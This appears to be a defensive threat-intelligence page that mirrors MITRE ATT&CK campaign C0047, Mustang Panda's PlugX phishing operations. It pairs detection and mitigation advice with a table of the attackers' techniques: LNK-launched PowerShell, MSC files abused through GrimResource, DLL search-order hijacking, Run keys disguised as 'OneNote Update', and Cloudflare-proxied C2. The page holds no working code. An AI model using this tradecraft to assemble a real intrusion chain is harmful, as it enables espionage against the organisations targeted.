C0047: RedDelta Modified PlugX Infection Chain Operations
RedDelta Modified PlugX Infection Chain Operations was executed by Mustang Panda from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia. RedDelta Modified PlugX Infection Chain Operations involved phishing to deliver malicious files or links to users prompting follow-on installer downloads to load PlugX on victim machines in a persistent state.[1]
Analyst context for executives and security teams
This campaign matters because it combines targeted phishing with follow-on downloads, persistence, and remote access tooling such as PlugX, with relationships to ShadowPad and multiple stealth and command-and-control techniques. For leaders, the practical issue is not only “malware delivery,” but whether the organization can prove that email, endpoint, identity, and network controls would expose a user-driven infection chain before it becomes persistent remote access.
Executive priority
Prioritize this as a resilience and readiness test for organizations with exposure to targeted phishing risk, especially those with users handling sensitive government, diplomatic, NGO, research, or regional business matters reflected in the ATT&CK description and related group context. Executives should ask whether security teams can show evidence for phishing prevention, suspicious installer execution, persistence creation, signed or masqueraded binaries, and outbound C2 monitoring, rather than relying on awareness training alone.
Technical view
ATT&CK does not provide campaign-specific detection text, so defenders should validate coverage from the related behaviors: spearphishing attachments and links, user execution of malicious files or links, possible client-side exploitation, PowerShell execution, abuse of msiexec.exe and mmc.exe, DLL abuse, hidden files, encrypted or encoded payloads, masqueraded tasks or services, registry run keys or startup folder persistence, execution guardrails, code signing abuse, system information discovery, and web or non-application-layer C2 including proxy use. The related PlugX and ShadowPad software entries support a strong focus on Windows endpoint visibility, while phishing-link relationships also make email, Office suite, and identity-provider telemetry relevant.
Likely telemetry
- Email security logs for attachments, embedded links, sender metadata, and user click events
- Web proxy, DNS, and secure web gateway logs for follow-on downloads and newly observed or suspicious domains
- Endpoint process creation telemetry for PowerShell, msiexec.exe, mmc.exe, installer activity, and unusual parent-child process chains
- Windows registry and startup folder monitoring for persistence via Run keys or startup locations
- Service, scheduled task, and system management logs for masqueraded task or service creation
Detection direction
- Map detections to the full chain instead of a single indicator: phishing delivery, user execution, installer or LOLBin execution, payload staging, persistence, discovery, and C2.
- Tune for suspicious use of legitimate Windows components such as PowerShell, msiexec.exe, and mmc.exe, with attention to command line, parent process, network access, and unusual file paths to reduce false positives.
- Baseline legitimate services, scheduled tasks, startup entries, signed software, and administrative console usage so masquerading and code-signing abuse are reviewable rather than automatically trusted.
- Correlate email or web-click events with endpoint execution and outbound network activity; isolated alerts may look low severity until linked as an infection chain.
- Expect blind spots where endpoint command-line logging, registry auditing, DLL load visibility, proxy logs, DNS logs, or identity-provider click telemetry are missing or not retained.
Mitigation priorities
- Strengthen phishing controls first: attachment and link inspection, detonation where available, user reporting workflows, and rapid containment of clicked links or opened files.
- Harden endpoint execution paths by controlling script execution, monitoring or restricting suspicious use of msiexec.exe and mmc.exe, and reviewing policies for unsigned, newly signed, or unusual binaries.
- Validate persistence controls around Run keys, startup folders, services, scheduled tasks, and hidden file locations.
- Maintain patching and exposure management for client applications because the related behaviors include exploitation for client execution.
- Improve egress control and monitoring for web-protocol C2, proxy use, suspicious domains, and unusual non-application-layer communications.
Analyst notes and limits
The supplied ATT&CK object identifies a campaign conducted from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia, attributed through ATT&CK relationship context to Mustang Panda, and involving phishing that delivered malicious files or links prompting installer downloads to load PlugX persistently. Related techniques provide useful defensive planning coverage even though ATT&CK does not include campaign-specific detection guidance.
Official detection is not provided, object-level platforms and tactics are not specified, and no indicators of compromise are included in the supplied fields. Local risk depends on the organization’s geography, sector, user population, telemetry retention, endpoint coverage, and exposure to the phishing and Windows execution patterns represented by the related techniques and software.
RedDelta Modified PlugX Infection Chain Operations
RedDelta Modified PlugX Infection Chain Operations was executed by Mustang Panda from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia. RedDelta Modified PlugX Infection Chain Operations involved phishing to deliver malicious files or links to users prompting follow-on installer downloads to load PlugX on victim machines in a persistent state.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.001 | PowerShell Sub-technique | Mustang Panda used LNK files to execute PowerShell commands leading to eventual PlugX installation during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1553.002 | Code Signing Sub-technique | Mustang Panda used legitimate, signed binaries such as `inkform.exe` or `ExcelRepairToolboxLauncher.exe` for follow-on execution of malicious DLLs through DLL search order hijacking in RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1090 | Proxy | Mustang Panda proxied communication through the Cloudflare CDN service during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1608.001 | Upload Malware Sub-technique | Mustang Panda staged malware on adversary-controlled domains and cloud storage instances during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1574.001 | DLL Sub-technique | Mustang Panda used DLL search order hijacking on vulnerable applications to install PlugX payloads during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1095 | Non-Application Layer Protocol | Mustang Panda communicated over TCP 5000 from adversary administrative servers to adversary command and control nodes during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1480 | Execution Guardrails | Mustang Panda included the use of Cloudflare geofencing mechanisms to limit payload download activity during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1082 | System Information Discovery | Mustang Panda captured victim operating system type via User Agent analysis during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Mustang Panda used Run registry keys with names such as `OneNote Update` to execute legitimate executables that would load through search-order hijacking malicious DLLS to ensure persistence during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1203 | Exploitation for Client Execution | Mustang Panda used the GrimResource exploitation technique via specially crafted MSC files for arbitrary code execution during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | Mustang Panda distributed malicious links in phishing emails leading to HTML files that would direct the victim to malicious MSC files if running Windows based on User Agent fingerprinting during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Mustang Panda stored installation payloads as encrypted files in hidden folders during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Mustang Panda leveraged malicious attachments in spearphishing emails for initial access to victim environments in RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Mustang Panda distributed malicious LNK objects for user execution during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | Mustang Panda masqueraded Registry run keys as legitimate-looking service names such as `OneNote Update` during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1564.001 | Hidden Files and Directories Sub-technique | Mustang Panda stored encrypted payloads associated with PlugX installation in hidden directories during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1588.004 | Digital Certificates Sub-technique | Mustang Panda acquired Cloudflare Origin CA TLS certificates during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1218.007 | Msiexec Sub-technique | Mustang Panda initial payloads downloaded a Windows Installer MSI file that in turn dropped follow-on files leading to installation of PlugX during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1583.001 | Domains Sub-technique | Mustang Panda registered adversary-controlled domains during RedDelta Modified PlugX Infection Chain Operations that were re-registrations of expired domains.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1218.014 | MMC Sub-technique | Mustang Panda used Microsoft Management Console Snap-In Control files, or MSC files, executed via MMC to run follow-on PowerShell commands during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | Mustang Panda distributed hyperlinks that would result in an MSC file running a PowerShell command to download and install a remotely-hosted MSI file during RedDelta Modified PlugX Infection Chain Operations.CitationRecorded Future RedDelta 2025 |
Groups, software, and campaigns
G0129: Mustang Panda
Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. [1][2][3][4][5][6][7][8][9][10][11][12][13]
S0596: ShadowPad
S0013: PlugX
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | f8608e36216a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Recorded Future RedDelta 2025
Insikt Group. (2025, January 9). Chinese State-Sponsored RedDelta Targeted Taiwan, Mongolia, and Southeast Asia with Adapted PlugX Infection Chain. Retrieved January 14, 2025.
Open source URL -
[2]
mitre-attack C0047Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.